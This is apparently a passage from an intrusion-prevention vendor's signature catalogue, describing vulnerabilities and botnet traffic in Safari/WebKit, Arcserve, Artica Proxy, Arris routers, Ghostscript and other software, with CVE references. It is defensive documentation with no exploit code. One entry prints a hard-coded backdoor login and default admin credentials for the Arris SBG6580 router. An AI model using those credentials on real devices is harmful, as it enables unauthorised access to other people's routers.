First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There exists a code execution vulnerability in Apple Safari. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Apple-Safari-Webkit-Use-After-Free-Code-Execution

References:

CVE-2010-1806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1806

BID-43049
http://www.securityfocus.com/bid/43049

Apple-Safari-Webkit-Webarchive-Injection

About this vulnerability:

An Apple Safari Webkit Webarchive Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Javascript Injection

Description:

A vulnerability in Apple Safari, versions before 6.2.6, 7.x before 7.1.6, and 8.x before 8.0.6, which allows remote attackers to use a file:// URL and up load a malicious .webarchive file when then allows the remote attacker to read arbitrary files, inject cross-domain Javascript, or silently install Safari extensions.

Situation:

File-Text_Apple-Safari-Webkit-Webarchive-Injection

References:

CVE-2015-1155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1155

Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089

About this vulnerability:

A vulnerability in WebKit

Risk:

Moderate

First detected in:

sgpkg-ips-1770-5242

Last changed:

sgpkg-ips-1770-5242

Platform:

Generic

Software:

Webkit

Type:

Cross-site Scripting

Description:

A logic issue in WebKit's handling of the parent-tab component causes an universal cross-site scripting vulnerability in older Safari browser versions.

Situation:

File-Text_Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089

References:

CVE-2017-7089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7089

Apple-Safari-XML-Parser-Infinite-Recursion-DoS

About this vulnerability:	Apple Safari XML Parser Infinite Recursion DoS vulnerability.
Risk:	High
First detected in:	sgpkg-ips-673-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Safari
Type:	Browser
Description:	A vulnerability exists in Apple Safari 4.0.4 allowing remote attackers to cause a denial of service condition via an XML document composed of a long series of start-tags followed by backslashes.
Situation:	File-TextId_Apple-Safari-XML-Parser-Infinite-Recursion-DoS

Apple-Software-Update-Remote-Command-Execution

About this vulnerability:

A remote command execution vulnerability in Apple Software Update

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Input Validation

Description:

There is a remote command execution vulnerability in the Software Update component of Apple Mac OS X. The vulnerability allows arbitrary code execution in the context of the Software Update.

Situation:

HTTP_SS-Apple-Software-Update-Remote-Command-Execution
File-TextId_Apple-Software-Update-Remote-Command-Execution

References:

CVE-2007-5863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5863

BID-26908
http://www.securityfocus.com/bid/26908

Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813

About this vulnerability:

A vulnerability in Apple WebKit

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Webkit

Type:

Malfunction

Description:

There exists a vulnerability in Apple WebKit that can allow a man-in-the-middle attacker to execute arbitrary code or cause a denial of service condition.

Situation:

File-Text_Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813

References:

CVE-2011-2813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2813

BID-50066
http://www.securityfocus.com/bid/50066

Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879

About this vulnerability:

A vulnerability in Apple WebKit

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

iOS

Software:

Webkit

Type:

Cross-site Scripting

Description:

There exists a vulnerability in Apple WebKit that can allow universal cross site scripting.

Situation:

File-Text_Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879

References:

CVE-2021-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879

Apple-Webkit-Memory-Corruption-CVE-2016-4657

About this vulnerability:

A vulnerability in Apple Webkit

Risk:

High

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

iOS

Software:

Webkit

Type:

Malfunction

Description:

A memory corruption vulnerability that allows arbitrary code execution or causing a denial of service condition has been reported in Webkit. Apple iOS versions before 9.3.5 are affected. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.

Situation:

File-Text_Apple-Webkit-Memory-Corruption-CVE-2016-4657

References:

CVE-2016-4657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4657

Apple-Webkit-Rowspan-DoS

About this vulnerability:

Apple Webkit rowspan Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Webkit

Type:

Misconfiguration

Description:

Large rowspan attribute within the html <td> tag might cause a denial of service in some Webkit builds.

Situation:

File-Text_Apple-Webkit-Rowspan-DoS

References:

CVE-2007-0342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0342

BID-22059
http://www.securityfocus.com/bid/22059

Apple-Webkit-Ruby-Annotation-Memory-Corruption

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple iTunes;Safari;Chrome

Type:

Malfunction

Description:

There is a memory corruption vulnerability within Apple WebKit, a component of Apple Safari and Google Chrome web browsers, as well as Apple iTunes. This vulnerability is due to incorrect handling of display: and counter-reset: properties within ruby:before and ruby:after style sheet blocks. Remote attackers may exploit these vulnerabilities by enticing target users to visit a specially crafted web page. Successful exploitation would allow injection and execution of arbitrary code within the context of the currently logged on user.

Situation:

File-Text_Apple-Webkit-Ruby-Annotation-Memory-Corruption

References:

CVE-2011-1440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1440

OSVDB-72205
http://www.osvdb.org/72205

Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability

About this vulnerability:

A vulnerability in Apple Computer XAR

Risk:

Moderate

First detected in:

sgpkg-ips-1409-5242

Last changed:

sgpkg-ips-1409-5242

Platform:

Mac OS

Software:

<os>

Type:

Malfunction

Description:

There exists a file write vulnerability in the Apple XAR command. Successful exploitation could result in arbitrary file overwrite.

Situation:

File-Binary_Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability

References:

CVE-2021-30833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30833

Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability

About this vulnerability:

A vulnerability in Apple Computer XAR

Risk:

Moderate

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Mac OS X

Software:

<os>

Type:

Malfunction

Description:

Improper validation of file names inside XAR files causes an arbitrary file write vulnerability in MacOS. A successful exploit allows an attacker to write arbitrary files on the target system.

Situation:

File-Binary_Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability

References:

CVE-2022-22582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22582

Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949

About this vulnerability:

An attempt to exploit a vulnerability in Apport detected

Risk:

High

First detected in:

sgpkg-ips-1791-5242

Last changed:

sgpkg-ips-1791-5242

Platform:

Linux

Software:

Apport

Type:

Input Validation

Description:

An issue was discovered in Apport before 2.20.4. In apport/ui.py, Apport reads the CrashDB field and it then evaluates the field as Python code if it begins with a "{". This allows remote attackers to execute arbitrary Python code.

Situation:

File-Text_Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949

References:

CVE-2016-9949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9949

AppRain-CMF-Arbitrary-PHP-File-Upload

About this vulnerability:

A AppRain CMF Arbitrary PHP File Upload vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-708-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AppRain

Type:

Input Validation

Description:

An input validation vulnerability in AppRain CMF, versions 0.1.5 and before, which allows remote attackers to upload arbitrary PHP files which can result in code execution.

Situation:

HTTP_CS-AppRain-CMF-Arbitrary-PHP-File-Upload

References:

CVE-2012-1153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1153

BID-51576
http://www.securityfocus.com/bid/51576

OSVDB-78473
http://www.osvdb.org/78473

Appsmith-RCE-CVE-2024-55964

About this vulnerability:

A vulnerability in Appsmith

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Linux

Software:

Appsmith

Type:

Insecure Configuration

Description:

An insecure configuration in the PostgreSQL instance in Appsmith which allows remote attackers to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Appsmith-RCE-CVE-2024-55964

References:

CVE-2024-55964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55964

APSystems-ECU-R-Command-Injection-CVE-2022-45699

About this vulnerability:

A vulnerability in APSystems ECU-R

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

APSystems ECU-R

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the administration interface of the APSystems ECU-R devices. An unauthenticated attacker could use this vulnerability to execute arbitrary commands as root.

Situation:

HTTP_CS-APSystems-ECU-R-Command-Injection-CVE-2022-45699

References:

CVE-2022-45699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45699

Arcadyan-Firmware-Path-Traversal-CVE-2021-20090

About this vulnerability:

A vulnerability in Arcadyan firmware

Risk:

High

First detected in:

sgpkg-ips-1386-5242

Last changed:

sgpkg-ips-1386-5242

Platform:

Generic

Software:

Arcadyan

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported in multiple routers and modems which use Arcadyan firmware. Successful exploitation of this vulnerability can lead to authentication bypass.

Situation:

HTTP_CSU-Arcadyan-Firmware-Path-Traversal-CVE-2021-20090

References:

CVE-2021-20090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090

Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow

About this vulnerability:

A vulnerability in CA BrightStor ARCserve Backup for Laptops and Desktops

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite Server; Computer Associates BrightStor Mobile Backup; Computer Associates Unicenter DMS Manager

Type:

Buffer Overflow

Description:

There exist two buffer overflow vulnerabilities in the way CA BrightStor ARCServe Backup for Laptops and Desktops service handles incoming messages. Specifically the vulnerabilities are due to lack of boundary check when processing user authentication requests. By sending specially crafted authentication request, an unauthenticated remote attacker can leverage these flaws to execute arbitrary code on the target host with System privileges.

Situation:

ARCserve_CS-Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow

References:

CVE-2007-5004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5004

BID-24348
http://www.securityfocus.com/bid/24348

ARCserve-D2D-Getnews-External-Entity-Injection

About this vulnerability:

A vulnerability in CA ARCserve D2D

Risk:

Moderate

First detected in:

sgpkg-ips-1308-5242

Last changed:

sgpkg-ips-1308-5242

Platform:

Generic

Software:

CA ARCserve D2D

Type:

Input Validation

Description:

Improper validation of request payload data causes an XML external entity injection vulnerability in CA ARCserve D2D. A successful attack may allow an attacker to gain access to information on the system.

Situation:

HTTP_CRL-ARCserve-D2D-Getnews-External-Entity-Injection

References:

CVE-2020-27858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27858

Arcserve-UDP-Authentication-Bypass-CVE-2023-26258

About this vulnerability:

An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected

Risk:

High

First detected in:

sgpkg-ips-1608-5242

Last changed:

sgpkg-ips-1608-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Insecure Configuration

Description:

Authentication bypass vulnerability in Arcserve Unified Data Protection (UDP).

Situation:

File-TextId_Arcserve-UDP-Authentication-Bypass-CVE-2023-26258

References:

CVE-2023-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26258

Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected.

Risk:

High

First detected in:

sgpkg-ips-1695-5242

Last changed:

sgpkg-ips-1695-5242

Platform:

Windows

Software:

Arcserve Unified Data Protection

Type:

Input Validation

Description:

A vulnerability in Arcserve Unified Data Protection, versions prior to 9.2, which allows remote attackers to upload arbitrary files and execute code in the context as SYSTEM, due to improper validation of upload files in FileHandlingServlet.

Situation:

HTTP_CS-Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal

References:

CVE-2023-42000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42000

Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service

About this vulnerability:

A vulnerability in Arcserve Unified Data Protection

Risk:

High

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1714-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Input Validation

Description:

A denial-of-service vulnerability exists in Arcserve Unified Data Protection (UDP). The vulnerability is due to improper validation of username in ASNative.dll. A remote unauthenticated attacker can exploit the vulnerability by sending crafted request to the target application. Successful exploitation could result in denial-of-service conditions in the target application.

Situation:

File-TextId_Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service

References:

CVE-2024-0801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0801

Arcserve-Unified-Data-Protection-Directory-Traversal

About this vulnerability:

A vulnerability in Arcserve Unified Data Protection

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Directory Traversal

Description:

Several directory traversal vulnerabilities exist in Arcserve Unified Data Protection (UDP). These vulnerabilities exist in reportFileServlet and exportServlet and are due to insufficient input validation of the file path. A remote unauthenticated attacker can exploit this vulnerability to result in information disclosure and denial of service.

Situation:

HTTP_CRL-Arcserve-Unified-Data-Protection-Directory-Traversal

References:

CVE-2015-4068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4068

Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure

About this vulnerability:

A vulnerability in Arcserve Unified Data Protection

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Input Validation

Description:

An information disclosure vulnerability exists in Arcserve Unified Data Protection (UDP). This vulnerability exists in EdgeServiceImpl and is due to insufficient input validation of certain SOAP requests using the getBackupPolicies method. A remote unauthenticated attacker can exploit this vulnerability to cause information disclosure.

Situation:

HTTP_CS-Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure

References:

CVE-2015-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4069

Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected

Risk:

High

First detected in:

sgpkg-ips-1710-5242

Last changed:

sgpkg-ips-1710-5242

Platform:

Windows

Software:

Arcserve Unified Data Protection

Type:

Input Validation

Description:

A vulnerability in Arcserve Unified Data Protection, verions 8.1 and earlier, and 9.2 and earlier, which allows remote attackers to upload and execute arbitrary code by sending crafted requests to the target system, due to improper validation of upload files in ImportNodeServlet.

Situation:

HTTP_CSH-Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal

References:

CVE-2024-0800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0800

Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure

About this vulnerability:

A vulnerability in Arcserve Unified Data Protection

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Input Validation

Description:

An information disclosure vulnerability exists in Arcserve Unified Data Protection (UDP). This vulnerability exists in EdgeServiceImpl and is due to insufficient input validation of certain SOAP requests using the getBackupPolicy method. A remote unauthenticated attacker can exploit this vulnerability to result in information disclosure.

Situation:

File-TextId_Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure

References:

CVE-2015-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4069

Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Arcserve Unified Data Protection

Risk:

Moderate

First detected in:

sgpkg-ips-1690-5242

Last changed:

sgpkg-ips-1690-5242

Platform:

Generic

Software:

Arcserve Unified Data Protection

Type:

Malfunction

Description:

The exposure of an unauthenticated file upload function and the insufficient validation of the data given thereto cause an unrestricted file upload vulnerability in Arcserve Unified Data Protection.

Situation:

File-TextId_Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload

References:

CVE-2023-41998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41998

Ares-Peer-To-Peer-Network-Usage

About this vulnerability:	Ares peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1712-5242
Platform:	Generic
Software:	Ares
Type:	Peer-to-Peer
Description:	Ares is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors. Popular clients include Ares p2p, Warez p2p and FileCroc.

Argosoft-FTP-Server-Dele-Command-BOF

About this vulnerability:

Buffer overflow in ArGoSoft FTP server

Risk:

Moderate

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ArGoSoft FTP Server

Type:

Buffer Overflow

Description:

ArGoSoft FTP server contains a buffer overflow vulnerability in the DELE command handling. A remote attacker could send a overly long DELE command to overflow a buffer, thus causing a denial of service and possibly execute arbitrary code on the server.

Situation:

FTP_CS-Long-Dele-Command-Detection

References:

CVE-2005-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0696

BID-12755
http://www.securityfocus.com/bid/12755

OSVDB-14611
http://www.osvdb.org/14611

ARJ-Archive-Long-Local-File-Header-7-Zip-BOF

About this vulnerability:

7-Zip archiver is vulnerable to a BOF when parsing long ARJ headers

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

7-Zip

Type:

Buffer Overflow

Description:

7-Zip archiver does not handle correctly ARJ archives that contain larger file headers than the ARJ specification allows. The format specifies 2600 bytes as the maximum size of a header, and 7-zip allocates 2672 bytes for each header. When parsing an ARJ file, the amount of data specified in the headers size field is copied to a fixed size buffer, resulting in a buffer overflow with malformed archives. The vulnerability allows remote attackers to execute arbitrary code on a victim machine, if they can persuade the victim into opening an malformed ARJ file with 7-zip.

Situation:

HTTP_7-Zip-ARJ-Archive-Long-Local-File-Header-Buffer-Overflow
File-Binary_ARJ-Archive-Long-Local-File-Header-7-Zip-BOF

References:

CVE-2005-3051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3051

BID-14925
http://www.securityfocus.com/bid/14925

Armageddon-Bot

About this vulnerability:	Armageddon Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Armageddon is a Botnet used for Distributed Denial of Service (DDoS) attacks.
Situation:	HTTP_CS-Armageddon-Bot-Traffic

ARMBot-Botnet

About this vulnerability:	ARMBot Botnet traffic has been detected
Risk:	High
First detected in:	sgpkg-ips-1772-5242
Last changed:	sgpkg-ips-1772-5242
Platform:	Windows; Linux
Software:	<os>
Type:	Backdoor
Description:	ARMBot Botnet traffic has been detected.
Situation:	HTTP_CRL-ARMBot-Botnet

Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites

About this vulnerability:

Arris Motorola Surfboard SBG6580 Multiple Vulnerabilites.

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Arris Motorola Surfboard

Type:

Insecure Configuration

Description:

Multiple vulnerabilites exist in Arris Motorola Surfboard SBG6580 which grant remote attackers control over the router. A hard coded backdoor account with credentials "technician/yZgO8Bvj" along with the default "admin/motorola" default credentials can be used to sign in the user into the router, where a persistant XSS vulnerability is exploited in the firewall configuration page. This allows the injection of Javascript that can perform any available action in the router interface. The respective fingerprint covers , CVE-2015-0964, CVE-2015-0965, and CVE-2015-0966.

Situation:

File-Text_Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites

References:

CVE-2015-0964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0964

Arris-TR3300-Command-Injection-CVE-2022-27002

About this vulnerability:

A vulnerability in Arris TR3300

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Arris TR3300

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Arris TR3300 wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-Arris-TR3300-Command-Injection-CVE-2022-27002

References:

CVE-2022-27002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27002

Arris-VAP2500-Management-Portal-Command-Execution

About this vulnerability:

An Arris VAP2500 Management Portal Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-695-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Arris VAP2500

Type:

Code Injection

Description:

A vulnerability in Arris VAP2500 management portal, before version FW08.41, which allows remote attackers to execute arbitrary commands via the tools_command.php page.

Situation:

HTTP_CRL-Arris-VAP2500-Management-Portal-Command-Execution

References:

CVE-2014-8423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8423

ARS-VBS-Loader-C2-Traffic

About this vulnerability:	ARS VBS Loader C2 Traffic traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1062-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ARS VBS Loader traffic was detected. This malicious loader is able to control victim's machine comprehensively. Usually it downloads some other malware to the system.
Situation:	HTTP_CSU-ARS-VBS-Loader-C2-Traffic

Artica-Proxy-Cyrus.php-Command-Injection

About this vulnerability:

A vulnerability in Artica Tech Artica Proxy

Risk:

Moderate

First detected in:

sgpkg-ips-1273-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy; Artica Tech Artica Mail appliance

Type:

Input Validation

Description:

There exists a command injection vulnerability in Artica Proxy. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Artica-Proxy-Cyrus.php-Command-Injection

References:

CVE-2020-17505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17505

Artica-Proxy-FW-Progress-Details-Directory-Traversal

About this vulnerability:

A vulnerability in Artica Tech Artica Proxy

Risk:

Moderate

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy

Type:

Directory Traversal

Description:

Insufficient input validation of request parameters in fw.progress.details.php causes a directory traversal vulnerability in Artica Proxy. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CS-Artica-Proxy-FW-Progress-Details-Directory-Traversal

References:

CVE-2020-13158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13158

Artica-Proxy-Fw.login.php-Apikey-SQL-Injection

About this vulnerability:

A vulnerability in Artica Tech Artica Proxy

Risk:

High

First detected in:

sgpkg-ips-1294-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Artica Proxy. The vulnerability is due to insufficient input validation in the apikey parameter within fw.login.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL code, potentially leading to bypass privilege and remote code execution.

Situation:

HTTP_CSU-Artica-Proxy-Fw.login.php-Apikey-SQL-Injection

References:

CVE-2020-17506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506

Artica-Proxy-Images.listener.php-Arbitrary-File-Read

About this vulnerability:

A vulnerability in Artica Tech Artica Proxy

Risk:

High

First detected in:

sgpkg-ips-1711-5242

Last changed:

sgpkg-ips-1711-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy

Type:

Input Validation

Description:

An arbitrary file read vulnerability has been reported in Artica Proxy. The vulnerability is due to improper HTTP request parameter sanitization. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary file read.

Situation:

HTTP_CSU-Artica-Proxy-Images.listener.php-Arbitrary-File-Read

References:

CVE-2024-2053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2053

Artica-Proxy-Squid.conf-Authentication-Bypass

About this vulnerability:

A vulnerability in Artica Proxy

Risk:

High

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1724-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Artica Proxy due to improper access configuration. Successful exploitation could result in remote command execution under the security context of the root user.

Situation:

HTTP_CS-Artica-Proxy-Squid.conf-Authentication-Bypass
Generic_CS-Artica-Proxy-Squid.conf-Authentication-Bypass

References:

CVE-2024-2056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2056

Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization

About this vulnerability:

A vulnerability in Artica Tech Artica Proxy

Risk:

High

First detected in:

sgpkg-ips-1711-5242

Last changed:

sgpkg-ips-1711-5242

Platform:

Generic

Software:

Artica Tech Artica Proxy

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Artica Proxy. The vulnerability is due to improper HTTP request parameter sanitization. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in remote command execution under the security context of the PHP interpreter.

Situation:

HTTP_CSU-Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization

References:

CVE-2024-2054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2054

Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow

About this vulnerability:

A vulnerability in Artifex Software Ghostscript

Risk:

High

First detected in:

sgpkg-ips-1587-5242

Last changed:

sgpkg-ips-1587-5242

Platform:

Generic

Software:

Ghostscript

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Ghostscript. This vulnerability is due to insufficient handling of a malicious PostScript file. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted file to an application using a vulnerable version of Ghostscript. Successful exploitation can lead to code execution under the security context of the target application.

Situation:

File-Text_Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow

References:

CVE-2023-28879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28879

Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961

About this vulnerability:

A vulnerability in Ghostscript

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Ghostscript

Type:

Malfunction

Description:

A sandbox bypass vulnerability has been reported in Artifex Ghostscript 9.25 and earlier due to Postscript error handling. Successful exploitation can lead to code execution under the security context of the target application.

Situation:

File-Text_Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961

References:

CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961

ASePortal-Parameter-SQL-Injection

About this vulnerability:

An ASePortal Parameter SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-727-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ASePortal

Type:

SQL Injection

Description:

A vulnerability in ASePortal, versions 2.4 - 2.5, which allows remote attackers to retrieve the admin session from the database through SQL injection which can be used to take over the admin user session, allowing the attacker to upload arbitrary code.

Situation:

HTTP_CRL-ASePortal-Parameter-SQL-Injection

References:

CVE-2008-5191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5191

OSVDB-46567
http://www.osvdb.org/46567

Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Ask Toolbar allows arbitary code execution

Risk:

High

First detected in:

sgpkg-ips-163-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ask Toolbar

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in the Ask Toolbar ActiveX control. This may lead to code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
File-Text_Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow

References:

CVE-2007-5107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5107

BID-25785
http://www.securityfocus.com/bid/25785

Asn-1-Bitstring-Overflow-MS04-007

About this vulnerability:

Remote system compromise using ASN.1 library weakness (MS04-007)

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

